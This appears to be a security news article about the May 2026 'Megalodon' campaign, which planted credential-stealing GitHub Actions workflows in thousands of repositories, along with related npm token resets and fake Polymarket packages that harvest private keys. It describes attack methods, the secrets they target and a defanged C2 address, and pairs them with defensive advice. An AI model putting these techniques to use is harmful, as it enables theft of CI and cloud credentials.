Supply chain attacks used to be about poisoning a single popular package and waiting. That era is over. On May 18, 2026, an attacker pushed 5,718 malicious commits to 5,561 distinct GitHub repositories in a six-hour window — between 11:36 a.m. and 5:48 p.m. UTC — using throwaway accounts and forged author identities like build-bot, auto-ci, ci-bot, and pipeline-bot. The campaign, dubbed Megalodon by SafeDep researchers, didn’t bother with the slow burn of a typosquat. It went straight for the CI/CD pipeline, and it should make every engineering lead reconsider what “trusted commit” actually means.
How Megalodon Weaponizes GitHub Actions Against You
According to SafeDep’s report, the Megalodon operator injected GitHub Actions workflow files containing base64-encoded bash payloads that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at 216.126.225[.]129:8443. The loot list: AWS credentials, Google Cloud access tokens, Azure IMDS data, SSH private keys, Docker and Kubernetes configurations, Vault tokens, Terraform credentials, shell history, .env files, credentials.JSON, service-account.JSON, GITHUB_TOKEN, GitLab and Bitbucket tokens, and matches against more than 30 secret regex patterns.
CI/CD runners are the soft underbelly of modern engineering. They hold the keys to production, they auto-execute code from pull requests, and most teams treat their workflow YAML like infrastructure plumbing nobody audits. If you’re a startup running a typical GitHub Actions pipeline, a single merged PR with a backdoored workflow file gives an attacker the credentials to your AWS account, your container registry, and your customer database — all in the time it takes the runner to spin up. Expect compliance auditors to start asking for workflow-file change logs the same way they ask for production access logs today.
Why the Two-Payload Strategy Signals a More Patient Attacker
SafeDep documented two variants: SysDiag, a mass-spread payload that triggers on every push and pull request, and Optimize-Build, a targeted variant that activates only on workflow_dispatch — GitHub’s manual on-demand trigger. The @tiledesk/tiledesk-server package was hit with the targeted variant, meaning the malware sits dormant in CI/CD runners until the attacker decides to pull the trigger. As SafeDep put it, “With 5,700+ repos compromised, even a small fraction yielding a usable GITHUB_TOKEN gives the attacker enough targets for on-demand triggering.”
The operational discipline here is what should worry defenders. The attacker traded reach for stealth. Imagine your team uses Tiledesk in a customer-facing chatbot — the npm install is clean, your scanners report nothing, and the backdoor only fires when the attacker decides your CI environment is worth raiding. That’s not a worm anymore. That’s a botnet of build pipelines waiting for commands. The next 12 months will see at least one major breach traced back to a workflow_dispatch payload that sat undetected for weeks. Teams running AI automation pipelines that touch production data are particularly exposed, because their CI runners often hold the broadest credential scope in the entire org.
The TeamPCP Connection and Why npm’s Token Reset Isn’t Enough
OX Security’s Moshe Siman Tov Bustan tied Megalodon to a broader wave, noting that “TeamPCP compromising GitHub was only the beginning” — a group that has also hit TanStack, Grafana Labs, OpenAI, and Mistral AI, partnered with BreachForums, LAPSUS$, and VECT, and deployed wiper malware against machines geolocated in Iran and Israel. In response to TeamPCP and the related Mini Shai-Hulud worm, npm invalidated all granular access tokens with write access that bypassed 2FA, and is pushing maintainers toward Trusted Publishing.
Socket’s analysis is blunt: “By burning every bypass-2FA token on the platform, npm cuts off the credentials the worm has already collected. Maintainers issue new ones. The worm, still active in the wild, goes back to harvesting them. The reset buys breathing room. It does not close the underlying hole.” If you maintain a published npm package, you should already be migrating to Trusted Publishing — not next quarter, this sprint. The token-rotation treadmill is a losing game when the attacker’s harvesting infrastructure is still live. Healthcare and fintech teams that ship through npm — including those building compliance-sensitive healthcare software — face the worst exposure, because their CI environments often include PHI-adjacent credentials that can’t be rotated without service downtime.
The Polymarket Imposters and the Social Engineering Layer
While Megalodon backdoors legitimate packages, a separate campaign tracked by SafeDep shows the other side of the supply chain knife. A throwaway account named polymarketdev published nine malicious npm packages impersonating Polymarket trading CLI tools — including polymarket-claude-code, polymarket-AI-agent, and polymarket-trader — all within a 30-second window. A postinstall script displays a fake wallet onboarding prompt asking users to paste their private key, claiming “it stays encrypted,” then POSTs the raw key in plaintext to a Cloudflare Worker.
The attacker built a functional CLI around the theft operation, complete with a credible GitHub repo. If you’re a developer evaluating crypto trading tools and you npm install polymarket-trader, you’d see a clean-looking onboarding flow that mimics legitimate wallet UX. This is supply chain attack as UX design. The lesson for engineering teams: install-time scripts deserve the same scrutiny as production code, and any package asking for a private key during install should be treated as hostile by default. Apply the same logic you’d use to evaluate trust boundaries in a blockchain versus traditional database decision — assume zero trust until the data path is proven.
FAQ
Q: What is the Megalodon GitHub attack? A: Megalodon is an automated campaign disclosed by SafeDep in which an attacker pushed 5,718 malicious commits to 5,561 GitHub repositories on May 18, 2026. The commits injected GitHub Actions workflow files with base64-encoded bash payloads designed to exfiltrate CI secrets, cloud credentials, SSH keys, and OIDC tokens to a C2 server.
Q: How do I check if my repository was hit by Megalodon?
A: Review your recent commit history for commits authored by build-bot, auto-ci, ci-bot, or pipeline-bot, or by GitHub accounts with random 8-character usernames. Audit any new or modified .GitHub/workflows/ files for base64-encoded bash, and check for outbound connections to 216.126.225[.]129:8443.
Q: What is Trusted Publishing and why is npm pushing it? A: Trusted Publishing lets package maintainers publish to npm using short-lived OIDC tokens from their CI provider instead of long-lived access tokens. Npm is urging migration because the Mini Shai-Hulud worm and TeamPCP campaigns have shown that any long-lived token — even one with 2FA — can be harvested and abused once attackers reach a CI runner.
Key Takeaways
- Audit every
.GitHub/workflows/change as a security-sensitive event; workflow YAML is now production code and deserves CODEOWNERS protection on par with auth modules. - Migrate npm publishing from long-lived tokens to Trusted Publishing this sprint — token rotation is reactive defense against an active harvesting operation.
- Assume any CI runner credential is one merged PR away from exfiltration; scope IAM roles to the minimum the build actually needs and prefer OIDC federation over static keys.
- Treat
workflow_dispatchtriggers as a privileged code path; require manual review of any workflow that runs only on manual dispatch, since attackers are using it for operational stealth. - Block postinstall scripts by default in CI (
npm install --ignore-scripts) and review them line by line in local dev — the Polymarket campaign shows that install-time code is now a primary attack surface for credential theft.